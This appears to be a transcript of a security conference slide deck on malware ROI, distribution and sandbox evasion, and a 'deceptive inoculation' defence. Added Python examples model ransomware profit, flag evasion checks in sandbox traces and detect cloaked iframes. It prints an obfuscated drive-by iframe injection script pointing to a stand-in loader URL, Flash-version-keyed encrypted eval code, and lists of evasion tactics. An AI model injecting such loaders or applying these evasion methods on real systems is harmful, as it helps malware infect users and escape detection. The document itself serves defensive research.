2. Introduction
Chief Software Architect for Junos Web App Secure
“Junos Web App Secure is a security deception technology
designed to lace web applications with honeypots on-the-fly”
More recently, leading efforts in malware research.
Can’t share exactly why,
but I can share some interesting ideas that have surfaced as a result.
4. Background
• Malware Analysis Background
  o Malware Collection Techniques
  o Malware Analysis Techniques
  o Signature Development
• Malware Authoring ROI
  o Malware ROI
  o Optimizing for Success
  o Hypothetical Example
• Evasion
  o Distribution Evasion
  o Sandbox Evasion
5. Background / Malware Collection
How do analysts get malware samples?
• Web Crawlers
• Torrents
• Usenet
• Malware Repositories
• Email
• Droppers
7. Background / Signatures
How do malware signatures get created?
1. Get a sample
2. Analyze it for unique behaviors
   - Generate heuristic behavior signature
3. Analyze it for unique data patterns
   - Generate file data signature
4. Distribute new signatures to customers
5. Remove old unnecessary signatures
8. Background / Malware ROI
Uninterrupted Lifecycle:
Research → Development → Testing → Distribution → Grow Infection Base
The infection base grows indefinitely. The more machines infected, the
more return the attacker gets for their initial investment.
In other words… Time = Money
9. Background / Malware ROI
Interrupted Lifecycle:
Research → Development → Testing → Distribution → Grow Infection Base
  → Sample Collected → Sample Detected → Signature Published
The infection base grows until a signature is published. Its growth rate then
declines rapidly and eventually becomes negligible. The more machines
infected, the more return the attacker gets for their initial investment.
So… Time to DETECTION = Money
10. Background / Optimizing For Success
Hypothetical Example:
Bob spends 20 hours researching his target environment. Another 20 hours
writing some ransomware and testing it. Finally, Bob pays someone to distribute
his malware for 50 cents per infection, with a distribution rate of 200 clients per
hour.
Bob’s ransom is $300 and 10% of his victims will choose to pay.
So for every hour Bob’s malware is undetected, he makes:
((200 clients * 0.1) * $300) - (200 clients * $0.50) = $5,900 per hour
Assume the infection rate remains constant for 72 hours; after subtracting Bob’s
time (40 hours at ~$50 an hour), Bob makes a total of $422,800.
11. Background / Optimizing For Success
Hypothetical Example:
Now assume his malware is detected and a signature is published, dropping the
successful ransom collection rate to 1 client per hour (10 infections per hour,
10% of whom pay):
(hours_before_detection * (((200 clients * 0.1) * $300) - (200 clients * $0.50)))
+ (hours_after_detection * (((10 clients * 0.1) * $300) - (10 clients * $0.50)))
Detection at 6 hours: Bob makes $52,870
Detection at 12 hours: Bob makes $88,500
Detection at 18 hours: Bob makes $120,130
Detection at 24 hours: Bob makes $153,760
So for each 6 hours Bob can avoid detection, he makes $30,000 vs. $1,770.
That’s a lot of motivation!
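The ROI model from the two "Optimizing For Success" slides, carried through as an added example (this is not code from the deck). All constants are the deck's hypothetical figures: 200 infections per hour at $0.50 each, a $300 ransom paid by 10% of victims, 10 infections per hour once a signature is out, a 72-hour campaign and 40 hours of Bob's time at $50 an hour. The model subtracts that $2,000 of labor once, which reproduces the 6-, 18- and 24-hour slide figures exactly (the slide's 12-hour figure appears to omit the labor deduction). The names `Campaign`, `hourly_profit`, `campaign_profit` and `detection_table` are this example's own.

```python
"""Malware-ROI model behind the "Time to DETECTION = Money" slides.
Added worked example; the figures are the deck's hypothetical ones."""

from dataclasses import dataclass


@dataclass(frozen=True)
class Campaign:
    infections_per_hour: float = 200.0          # distribution rate before a signature ships
    cost_per_infection: float = 0.50            # paid to the distributor per infection
    ransom: float = 300.0
    pay_rate: float = 0.10                      # fraction of victims who choose to pay
    labor_hours: float = 40.0                   # 20 h research + 20 h development/testing
    hourly_rate: float = 50.0                   # value of the author's own time
    detected_infections_per_hour: float = 10.0  # rate after detection (1 paying victim/hour)


def hourly_profit(c: Campaign, infections_per_hour: float) -> float:
    """Net profit for one hour at the given infection rate:
    (infections * pay_rate * ransom) - (infections * cost_per_infection)."""
    revenue = (infections_per_hour * c.pay_rate) * c.ransom
    cost = infections_per_hour * c.cost_per_infection
    return revenue - cost


def campaign_profit(c: Campaign, hours_before_detection: float,
                    total_hours: float = 72.0) -> float:
    """Total profit over `total_hours` when a signature is published at
    `hours_before_detection`; the author's labor is charged once."""
    if not 0 <= hours_before_detection <= total_hours:
        raise ValueError("detection time must fall inside the campaign window")
    before = hours_before_detection * hourly_profit(c, c.infections_per_hour)
    after = (total_hours - hours_before_detection) * hourly_profit(c, c.detected_infections_per_hour)
    return before + after - c.labor_hours * c.hourly_rate


def detection_table(c: Campaign, step_hours: float = 6.0,
                    total_hours: float = 72.0) -> list[tuple[float, float]]:
    """(detection_hour, total_profit) rows for every multiple of `step_hours`,
    i.e. what each additional block of evasion time is worth to the author."""
    rows = []
    t = step_hours
    while t <= total_hours:
        rows.append((t, campaign_profit(c, t, total_hours)))
        t += step_hours
    return rows


if __name__ == "__main__":
    bob = Campaign()
    print(f"undetected hour: ${hourly_profit(bob, bob.infections_per_hour):,.0f}")
    for hour, profit in detection_table(bob):
        print(f"detection at {hour:4.0f} h -> ${profit:,.0f}")
```

The table makes the slide's point mechanically: every six hours of delayed detection is worth roughly 6 * ($5,900 - $295) to the author, which is why time to detection, not infection count, is the quantity worth attacking from the defender's side.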
12. Background / Distribution Evasion
• You can’t analyze something you can’t get.
• You can’t generate signatures if you can’t analyze.
So if you can avoid serving malware to analysis labs, you can avoid detection
and signature distribution.
Distribution Evasion: distribute malware only to a select set of targets,
narrow enough to exclude analysis labs.
13. Background / Distribution Evasion
Distribution Evasion Tactics:
• Don’t serve to search engines (Google, Yahoo, Bing, etc…)
• Don’t serve to known security lab IPs (Symantec, McAfee, etc…)
• Don’t serve to an environment you can’t infect (missing plugins,
  unsupported OS, etc…)
• Randomly choose not to serve
• Serve only to specific countries/IP ranges
• Serve only to known browsers
• Serve only if the referer is whitelisted
• Serve only once per IP
14. Background / Distribution Evasion
Distribution Evasion Implementation:
1. Inject an obfuscated drive-by download hook into compromised sites (packed with the common p,a,c,k,e,d packer; backslashes lost in extraction restored):
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('<0 8="7/a">6 2="4://5.9.f";b.g("<3 e=\\"1\\" d=\\"1\\" c=\\""+2+"\\"></3>");</0>',17,17,'script||ste|iframe|http|www|var|text|type|google|javascript|document|src|height|width|com|write'.split('|'),0,{}))</script>
Deobfuscated, it looks like this (the packed sample above carries www.google.com as a stand-in host; the loader URL below shows where a real one would sit):
<script type="text/javascript">
var ste = "http://exmpl.badness.ru/loader.php?key=Ah7Bvv034";
document.write("<iframe width=\"1\" height=\"1\" src=\"" + ste + "\"></iframe>");
</script>
But this does nothing to stop automated crawlers in a research lab.
15. Background / Distribution Evasion
Distribution Evasion Implementation:
2. Add client-side specificity: the malware requires a specific version of
Flash to exploit a client, so the drive-by code can hide itself unless you
have that version of Flash. The installed plugin version is used as the
decryption key, so the wrong version simply yields garbage instead of code:
<script type="text/javascript">
… encryption/decryption code …
eval(decrypt("4f534514404652100c1016594d43460b1e1b54415844591750515d585d414a1d4b4718585c535355431e445949085d54480970510276434f02030d14035656504c5f525a471c4042584451191b0b5f5743555c5c15435c5d4658046a1a036511195a525d545a430d6d12056d1b17454352096d1b17141e1941445c1613121b6f1b0c0b1b5a5445515c550a13100c", navigator.plugins['Shockwave Flash'].version));
</script>
Now if the lab isn’t using flash version 12.0.0.44, the drive-by iframe will not
16. Background / Distribution Evasion
Distribution Evasion Implementation:
3. Add server-side specificity and filtering: the iframe points to a server
whose sole purpose is to exploit browsers and serve malware. In addition
to picking the right exploit for the target client, it will also not serve malware
unless specific conditions are met:
• You’re not a search engine
• Your IP is not blacklisted, or is in a whitelist
• You’re using an exploitable OS and browser
• This is the first time you have loaded the iframe
• Drive-by code has been injected into the domain of your referer
Since the research lab doesn’t know what conditions the distribution server
requires, it is exceptionally difficult to trick it into serving the malware.
17. Background / Sandbox Evasion
Sandbox Evasion Tactics:
If any of the following are true, do not execute the malware payload:
• Significant clock skew
• Debugger is attached
• Virtual machine detected
• No internet connection
• Unexploitable environment
• Sandbox software detected
• Sleep statements abort prematurely
Sandboxes can only run for a fixed period of time per sample (usually 30-60
seconds), so the malware may try to run longer:
• Long sleep before payload execution
• Schedule payload execution for some time in the future
18. Background / Sandbox Evasion
Sandbox evasion techniques can be grouped into several high-level categories:
• Specificity
• Triggers
• Detection
• Interruption
• Dialogs
Any given malware sample may do zero or more of these.
19. Background / Sandbox Evasion
Specificity:
• Has internet connection
• Has correct software versions
• Has correct OS
• Has expected security policies
• Public IP is in correct geographical region
• Clock skew is minimal
• Account data is present (Gmail, AIM, Facebook, etc…)
20. Background / Sandbox Evasion
Specificity (as seen in samples):
Requires an email handling app like Outlook or Thunderbird.
Requires .NET framework.
Requires an internet connection.
Requires Win 95/98.
21. Background / Sandbox Evasion
Triggers:
• Sleep for several minutes
• Require multiple executions
• Wait for one or more reboots
• Wait for event
  o User opens .txt file
  o User launches browser
  o User switches to battery power
  o User updates Windows
  o User installs software
  o User connects to WiFi
  o HID activity (mouse, keyboard, webcam, mic)
22. Background / Sandbox Evasion
Triggers (as seen in samples):
Requires a browser restart to trigger the payload.
Requires a second execution.
23. Background / Sandbox Evasion
Detection:
• Debugger hooks
• Virtual machines
  o Registry keys, serial numbers, MAC addresses
  o Processes, services, drivers, open ports
  o VM-specific ASM instructions
• Sandbox software
  o Open ports, processes, files
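From the analyst's side, the Specificity, Triggers, Detection and Interruption categories above translate into API-call patterns that show up in a sandbox behaviour log. The following scanner is an added example, not the deck's code: it walks a trace of (API, arguments) pairs and reports which evasion categories a sample exhibits. The trace format is an assumption loosely modelled on Cuckoo-style behaviour logs, `SAMPLE_TRACE` is constructed for this example, and the artifact lists (VirtualBox/VMware registry names and MAC prefixes, `VBoxService.exe`, `dbghelp.dll`) are the well-known ones the deck alludes to.

```python
"""Flag sandbox-evasion tactics in a sandbox API-call trace.
Added example; the trace layout is an assumption and SAMPLE_TRACE is constructed."""

from collections import defaultdict

DEBUGGER_APIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent", "NtQueryInformationProcess"}
SLEEP_APIS = {"Sleep", "SleepEx", "NtDelayExecution"}
CONNECTIVITY_APIS = {"InternetCheckConnectionA", "InternetCheckConnectionW", "InternetGetConnectedState"}
REBOOT_APIS = {"ExitWindowsEx", "InitiateSystemShutdownA", "InitiateSystemShutdownW"}
VM_MARKERS = ("virtualbox", "vbox", "vmware", "qemu", "xen")
SANDBOX_ARTIFACTS = {"vboxservice.exe", "vmtoolsd.exe", "cuckoomon.dll", "dbghelp.dll"}
VM_MAC_PREFIXES = ("08:00:27", "00:0c:29", "00:50:56", "00:05:69")   # VirtualBox / VMware OUIs
LONG_SLEEP_MS = 60_000   # sandboxes typically allow a sample only 30-60 s (slide 17)

# Constructed trace of one sample: (api, arguments) in call order.
SAMPLE_TRACE = [
    ("IsDebuggerPresent", {}),
    ("RegOpenKeyExA", {"key": r"HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions"}),
    ("Process32Next", {"name": "VBoxService.exe"}),
    ("GetAdaptersInfo", {"mac": "08:00:27:1a:2b:3c"}),
    ("NtDelayExecution", {"ms": 600000}),          # ten-minute sleep before doing anything
    ("GetTickCount", {}),
    ("NtDelayExecution", {"ms": 100}),
    ("GetTickCount", {}),                          # did the sandbox shorten that sleep?
    ("InternetCheckConnectionA", {"url": "http://example.invalid/"}),
    ("RegSetValueExA", {"key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce",
                        "value": "C:\\Users\\victim\\AppData\\x.exe"}),
    ("ExitWindowsEx", {"flags": "EWX_REBOOT"}),
]


def _args_text(args):
    """Case-folded, space-joined argument values for substring matching."""
    return " ".join(str(v) for v in args.values()).lower()


def scan(trace):
    """Return {category: [finding, ...]} using the deck's category names."""
    findings = defaultdict(list)
    for i, (api, args) in enumerate(trace):
        blob = _args_text(args)
        if api in DEBUGGER_APIS:
            findings["Detection"].append(f"#{i} {api}: debugger check")
        if api.startswith(("RegOpenKey", "RegQueryValue")) and any(m in blob for m in VM_MARKERS):
            findings["Detection"].append(f"#{i} {api}: VM registry artifact {args.get('key')}")
        if api.startswith("Process32") and blob in SANDBOX_ARTIFACTS:
            findings["Detection"].append(f"#{i} {api}: sandbox/VM process {args.get('name')}")
        if api == "GetAdaptersInfo" and str(args.get("mac", "")).lower().startswith(VM_MAC_PREFIXES):
            findings["Detection"].append(f"#{i} {api}: VM MAC prefix {args.get('mac')}")
        # GetTickCount -> sleep -> GetTickCount: the sample measures whether the sleep was cut short
        if (api == "GetTickCount" and i >= 2 and trace[i - 1][0] in SLEEP_APIS
                and trace[i - 2][0] == "GetTickCount"):
            findings["Detection"].append(f"#{i} timing check around {trace[i - 1][0]} (sleep acceleration)")
        if api in SLEEP_APIS and int(args.get("ms", 0)) >= LONG_SLEEP_MS:
            findings["Triggers"].append(f"#{i} {api}: {args['ms']} ms sleep before continuing")
        if api.startswith("RegSetValue") and ("runonce" in blob or "currentversion\\run" in blob):
            findings["Triggers"].append(f"#{i} {api}: persistence, waits for reboot/second execution")
        if api in CONNECTIVITY_APIS:
            findings["Specificity"].append(f"#{i} {api}: requires an internet connection")
        if api in REBOOT_APIS:
            findings["Interruption"].append(f"#{i} {api}: forces reboot/logout")
    return dict(findings)


def tactics(trace):
    """Sorted list of evasion categories the trace exhibits (empty if none)."""
    return sorted(scan(trace))


if __name__ == "__main__":
    for category, items in scan(SAMPLE_TRACE).items():
        print(category)
        for item in items:
            print("   ", item)
```

A sample whose trace ends right after the checks in the Detection bucket, with no payload activity, is exactly the "runs clean in the sandbox" case the deck describes; the scanner's value is in surfacing that the sample looked before it decided not to act, which a plain behavioural signature would miss.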
24. Background / Sandbox Evasion
Detection:
Themida: a legitimate software piracy protection wrapper designed to detect
VMs and debuggers. Go figure, malware authors use it too.
Debugger detection. And hey, they even explained how to turn off SoftIce
(just in case you didn’t know how).
No printer?
25. Background / Sandbox Evasion
Interruption:
• Analysis framework interruption:
  o Force reboot or logout
  o Enable firewall / whitelist C&C servers
• Screen capture interruption:
  o Open dialogs minimized
  o Open other apps maximized
  o Flashing components / animation
  o Hidden mouseover components
26. Background / Sandbox Evasion
Interruption:
Force a reboot.
Screenshot evasion: the “Play” button flashes. We got lucky and took the
screenshot at the right time.
28. Background / Sandbox Evasion
Simple Dialogs:
What are they?
• Fake apps
  o Fake installers
  o Fake errors
Why?
• Prevent sandbox analysis
• Phish for information
• Legitimize red flags (UAC, firewall notices, etc…): it looks real, so it’s probably safe
29. Background / Sandbox Evasion
Simple Dialogs:
Legitimize UAC dialogs.
Require basic human input (click a button).
31. Background / Sandbox Evasion
Advanced Dialogs:
Requires a password, presumably available with the download link.
Captcha-style dialog.
Fake dialog: this dialog looks similar to the default theme of XP, but is
clearly not.
32. Deceptive Inoculation
Bottom line, malware takes great care not to run in a sandbox environment.
Let’s all be sandboxes!
(or at least pretend to be)
33. Deceptive Inoculation
• Distribution Deception
  o Prevent your personal computer from being sent malware in the first
    place (stop drive-by downloads).
• Sandbox Deception
  o Prevent malware from executing a payload when launched on your
    personal computer.
34. Inoculation / Distribution Evasion
Pretend you’re Googlebot:
1. Firefox: Install User-Agent-Switcher
2. Set User-Agent to: Googlebot-Image (Googlebot)
Pretend none of your plugins are enabled:
1. Firefox: Go to Tools > Add-ons
2. For everything in the list, select “Ask To Activate”
   (Java, Adobe Acrobat, Flash, Silverlight, Office, PDF Reader, ...)
Disable referers:
1. Firefox: Go to about:config
2. Set “network.http.sendRefererHeader” to 0
35. Inoculation / Distribution Evasion
Request Suspicious Content Twice:
This doesn’t exist yet, but what if….
[Diagram: an IFRAME VALIDATOR sits between the browser and the web.
“iframe: badsite.com” to the Bad Server returns embedded flash; “repeat:
badsite.com” returns no embedded flash. “iframe: goodsite.com” to the Good
Server returns no embedded flash.]
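The validator in that diagram, written out as an added example (the deck describes the idea as not yet existing; this is not the author's or Juniper's code). The validator fetches an embedded iframe's target more than once under different client profiles (a Flash-enabled browser, the same browser with no plugins, and a Googlebot user agent, mirroring the previous slide) and treats any disagreement in the active content between fetches as a sign the server is serving selectively. The transport is a caller-supplied `fetch(url, profile)` callable, so the example runs offline against constructed stand-ins for the deck's Bad Server and Good Server; `badsite.com` and `goodsite.com` are the diagram's own labels, and the other names are this example's.

```python
"""Differential fetch validator for embedded iframes: the "request suspicious
content twice" idea.  Added example; servers below are constructed stand-ins."""

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ClientProfile:
    name: str
    user_agent: str
    ip: str
    plugins: tuple = ()


# Constructed profiles; addresses are documentation-range placeholders.
BROWSER = ClientProfile("browser", "Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0",
                        "198.51.100.7", ("Shockwave Flash",))
NO_PLUGINS = ClientProfile("browser-no-plugins", BROWSER.user_agent, "198.51.100.8")
CRAWLER = ClientProfile("crawler", "Googlebot-Image (Googlebot)", "198.51.100.9")

ACTIVE_CONTENT = re.compile(r"<(embed|object|iframe|script)\b", re.I)


def active_content(html: str) -> frozenset:
    """Names of the active-content tags present in a response body."""
    return frozenset(m.group(1).lower() for m in ACTIVE_CONTENT.finditer(html))


def validate_iframe(url: str, fetch, profiles=(BROWSER, NO_PLUGINS, CRAWLER)) -> dict:
    """Fetch `url` twice per profile via `fetch(url, profile)` (assumed to return
    the body as a string).  A server that answers consistently regardless of who
    asks, and how often, is 'consistent'; any disagreement is 'cloaked'."""
    responses = {}
    for profile in profiles:
        first = active_content(fetch(url, profile))
        repeat = active_content(fetch(url, profile))
        responses[profile.name] = (first, repeat)
    distinct = {seen for pair in responses.values() for seen in pair}
    return {"url": url,
            "verdict": "consistent" if len(distinct) <= 1 else "cloaked",
            "responses": responses}


class FakeBadServer:
    """Constructed stand-in for the diagram's Bad Server: a Flash-capable browser
    gets an embedded object on its first visit only; crawlers, plugin-less clients
    and repeat visitors from the same IP get a blank page (slides 13 and 16)."""

    def __init__(self):
        self.served_ips = set()

    def __call__(self, url: str, profile: ClientProfile) -> str:
        if ("googlebot" in profile.user_agent.lower()
                or "Shockwave Flash" not in profile.plugins
                or profile.ip in self.served_ips):
            return "<html><body></body></html>"
        self.served_ips.add(profile.ip)
        return ('<html><body><object type="application/x-shockwave-flash" '
                'data="loader.swf"></object></body></html>')


def fake_good_server(url: str, profile: ClientProfile) -> str:
    """Constructed stand-in for the Good Server: same static page for everyone."""
    return "<html><body><p>Hello</p></body></html>"


if __name__ == "__main__":
    for target, server in (("http://badsite.com/x.html", FakeBadServer()),
                           ("http://goodsite.com/x.html", fake_good_server)):
        report = validate_iframe(target, server)
        print(report["url"], "->", report["verdict"])
```

The comparison is on the set of active-content tags rather than the raw bytes, so ordinary per-request noise (timestamps, session ids) does not produce false "cloaked" verdicts, while the serve-once-per-IP and plugin-gating behaviours from the earlier slides do: the first browser fetch returns an object tag and every other fetch returns none.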
36. Inoculation / Sandbox Evasion
Permanent Debugger
1. Install a debugger
2. Hook every process automatically
Spoof VMWare Artifacts:
1. Create stub exe called “VBoxService.exe” and leave it running on boot.
Skew your clock
1. Change system time to be 1 year behind
2. Disable clock syncing
37. Inoculation / Sandbox Evasion
Sandbox Emulation
1. Open ports (cuckoo: 2042, mongodb: 27017)
2. Configure as a Cuckoo guest:
   http://docs.cuckoosandbox.org/en/latest/installation/guest/
   But make sure to cripple the agent!
1. Add a dll named “dbghelp.dll” to the registry so it loads into every process
2. Temporarily assign the Windows product ID “76487-337-8429955-22614”
   (assign on boot, revert on shutdown)
These changes may result in instability to the system, and would require
some additional testing in a well-used desktop environment.
Look into Anubis, JoeBox, CWSandBox, ThreatExpert, and Cuckoo. The
38. Conclusion
Practicality:
As it stands, these techniques require some complex
administrative/programming tasks, and would need to be
updated regularly.
Ideally these types of techniques could be packaged into
software that automatically updates and manages
settings for you.
39. Conclusion
Perceived Efficacy:
With just these 5 strategies, we were able to prevent 20%
of malware activity in the samples we analyzed.
True Efficacy:
Hard to say how effective it really is, because the samples this works on
are less likely to be identified as known malware.
Fortunately, this means it will reduce malware infection for samples your AV
is unlikely to detect with signatures.
40. More Information
Contact Info:
Email: kadams@juniper.net
Twitter: kadams_sec
LinkedIn:
https://www.linkedin.com/in/adamsk
Presentation Material:
http://forums.juniper.net/t5/Security-Mobility-Now/bg-p/networkingnow
References: http://www.fireeye.com/blog/technical/malware-research/2011/01/the-dead-giveaways-of-vm-awaremalware.html